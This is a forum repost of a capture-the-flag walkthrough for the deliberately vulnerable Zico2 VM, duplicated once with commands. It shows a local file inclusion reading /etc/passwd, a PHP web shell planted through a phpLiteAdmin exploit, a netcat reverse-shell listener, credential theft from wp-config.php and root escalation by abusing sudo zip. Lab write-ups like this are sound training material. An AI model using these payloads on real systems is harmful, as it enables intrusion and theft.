kevincarrera
Machine Learning Expert
Divine
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
400 XP
Today we are going to take another boot2root challenge known as Zico2 By âRafaelâ, where we have to root the system to complete the challenge.
Download this VM here: https://download.vulnhub.com/zico/zico2.ova
Difficulty Level: Intermediate
Penetration Methodologies
Scanning
Enumeration
Exploiting
Privilege Escalation
Capture the flag
Walkthrough
Scanning
Letâs start off with finding IP using netdiscover and in this case, our IP is 192.168.1.108.
Time to scan the Targetâs IP with Nmap. The scan result shows port 22(ssh), port 111(rpcbind) and port 80 are open.
Enumeration
Since port 80 is running HTTP, so our obvious choice is to browse Targetâs IP in the browser.
We scroll through the page and click on âcheck them outâ as can be seen in the following screenshot.
After clicking on the previous page it takes us here and where we notice the URL which was looking for tools.html page and thus it could be vulnerable to LFI, letâs verify it.
Here I tried to get LFI and succeeded with â/../../etc/passwdâ. Now as we can read the content of passwd file we find a user âzicoâ in there. Letâs just save this info for now.
While enumerating directories through dirb, found an interesting directory â/dbadminâ.
When we browse â/dbadminâ directory, it displays a file named âtest_db.phpâ.
Here, we can see a php database login page along with version name, so we can google things up or if we go by the name of âtest_dbâ it hints at a default setup.
So tried âadminâ as password and it worked.
Exploiting
Next, we are using âSearchsploitâ and as the name indicates, it will search for all exploits and shellcodes for phpliteadmin(in this case). In the screenshot we can see that it is vulnerable to Remote php code execution and EDB-ID for the same is â24044â. Once we copy it to the current working directory (/root/24044.txt) and open it, we find guidelines to exploit the db.
Here we have followed the guidelines :
Step1: Created a database and named it âshell.phpâ (we had to add the extension â.phpâ with the database name)
Step 2: Created a table âshellâ. Inside the table, we created a column âfieldâ, selected the type of the column to be an âIntegerâ and set the default value to â<?php echo system($_GET[âcmdâ]); ?>â.
From the following screenshot, it can be seen that our php code script has been saved in the database.
Now we just have to run the file (the full path of the created php file is exposed)
So, to execute the file we can use the previously detected LFI vulnerability. And we have got lucky as we are inside âwww-dataâ .
Time to set up a netcat listener in our local machine and run the python code inside the uploaded shell to get a reverse shell. (refer next screenshot for the listener)
Python code reference:
To simulate a proper shell with TTY we use python one-liner. Once at the shell, we find âwp-config.phpâ file inside â/home/zico/wordpressâ.
Inside the wp-config.php file, we discover a database user zico and its password.
Privilege Escalation
We use recently discovered credentials to login through ssh.
Then we use the sudo command to list all the commands the user can run with root privileges and we can see that the user can run both tar and zip commands as root without the need to enter any password.
So, now in the process of escalating the privileges from âzicoâ to ârootâ. At first, we create a file ârajâ than we perform three different tasks in a single line of code: first, we zip the file ârajâ second move it to /tmp/nisha.zip folder and lastly unzip it which will pop the root shell.
Finally, we get âflag.txtâ inside the root directory. Hence, we accomplished the task.
Here is the complete reference to exploit sudo rights: https://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights/
Author: Nisha Yadav is trained in Certified Ethical hacking and Bug Bounty Hunter. She is currently working at Ignite Technologies as a Security Analyst. Connect with her here
Download this VM here: https://download.vulnhub.com/zico/zico2.ova
Difficulty Level: Intermediate
Penetration Methodologies
Scanning
- Netdiscover
- Nmap
Enumeration
- HTTP surfing
- Directory enumeration
Exploiting
- LFI
- Obtaining reverse shell via netcat
Privilege Escalation
- Login through SSH
- Identify userâs credential
- Abusing SUID binaries
Capture the flag
Walkthrough
Scanning
Letâs start off with finding IP using netdiscover and in this case, our IP is 192.168.1.108.
Code:
netdiscoverTime to scan the Targetâs IP with Nmap. The scan result shows port 22(ssh), port 111(rpcbind) and port 80 are open.
Code:
nmap -A 192.168.1.108Enumeration
Since port 80 is running HTTP, so our obvious choice is to browse Targetâs IP in the browser.
We scroll through the page and click on âcheck them outâ as can be seen in the following screenshot.
After clicking on the previous page it takes us here and where we notice the URL which was looking for tools.html page and thus it could be vulnerable to LFI, letâs verify it.
Here I tried to get LFI and succeeded with â/../../etc/passwdâ. Now as we can read the content of passwd file we find a user âzicoâ in there. Letâs just save this info for now.
While enumerating directories through dirb, found an interesting directory â/dbadminâ.
Code:
dirb http://192.168.1.108/When we browse â/dbadminâ directory, it displays a file named âtest_db.phpâ.
Here, we can see a php database login page along with version name, so we can google things up or if we go by the name of âtest_dbâ it hints at a default setup.
So tried âadminâ as password and it worked.
Exploiting
Next, we are using âSearchsploitâ and as the name indicates, it will search for all exploits and shellcodes for phpliteadmin(in this case). In the screenshot we can see that it is vulnerable to Remote php code execution and EDB-ID for the same is â24044â. Once we copy it to the current working directory (/root/24044.txt) and open it, we find guidelines to exploit the db.
Code:
searchsploit phpliteadmin
searchsploit -m 24044
cat 24044.txtHere we have followed the guidelines :
Step1: Created a database and named it âshell.phpâ (we had to add the extension â.phpâ with the database name)
Step 2: Created a table âshellâ. Inside the table, we created a column âfieldâ, selected the type of the column to be an âIntegerâ and set the default value to â<?php echo system($_GET[âcmdâ]); ?>â.
From the following screenshot, it can be seen that our php code script has been saved in the database.
Now we just have to run the file (the full path of the created php file is exposed)
So, to execute the file we can use the previously detected LFI vulnerability. And we have got lucky as we are inside âwww-dataâ .
Code:
http://192.168.1.108/view.php?page=../../usr/databases/shell.php&cmd=whoamiTime to set up a netcat listener in our local machine and run the python code inside the uploaded shell to get a reverse shell. (refer next screenshot for the listener)
Python code reference:
LoadingâŚ
pentestmonkey.net
Code:
http://192.168.1.108/view.php?page=../../usr/databases/shell.php&cmd= python shellTo simulate a proper shell with TTY we use python one-liner. Once at the shell, we find âwp-config.phpâ file inside â/home/zico/wordpressâ.
Code:
nc -lvp 1234
python -c 'import pty;pty.spawn("bin/bash")'
ls
cd /home
ls
cd zico
ls
cd wordpress
lsInside the wp-config.php file, we discover a database user zico and its password.
Code:
cat wp-config.phpPrivilege Escalation
We use recently discovered credentials to login through ssh.
Then we use the sudo command to list all the commands the user can run with root privileges and we can see that the user can run both tar and zip commands as root without the need to enter any password.
So, now in the process of escalating the privileges from âzicoâ to ârootâ. At first, we create a file ârajâ than we perform three different tasks in a single line of code: first, we zip the file ârajâ second move it to /tmp/nisha.zip folder and lastly unzip it which will pop the root shell.
Finally, we get âflag.txtâ inside the root directory. Hence, we accomplished the task.
Code:
ssh [email protected]
sudo -l
touch raj
sudo zip /tmp/nisha.zip /home/zico/raj -T --unzip-command="sh -c /bin/bash"
cd /root
ls
cat flag.txtHere is the complete reference to exploit sudo rights: https://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights/
Author: Nisha Yadav is trained in Certified Ethical hacking and Bug Bounty Hunter. She is currently working at Ignite Technologies as a Security Analyst. Connect with her here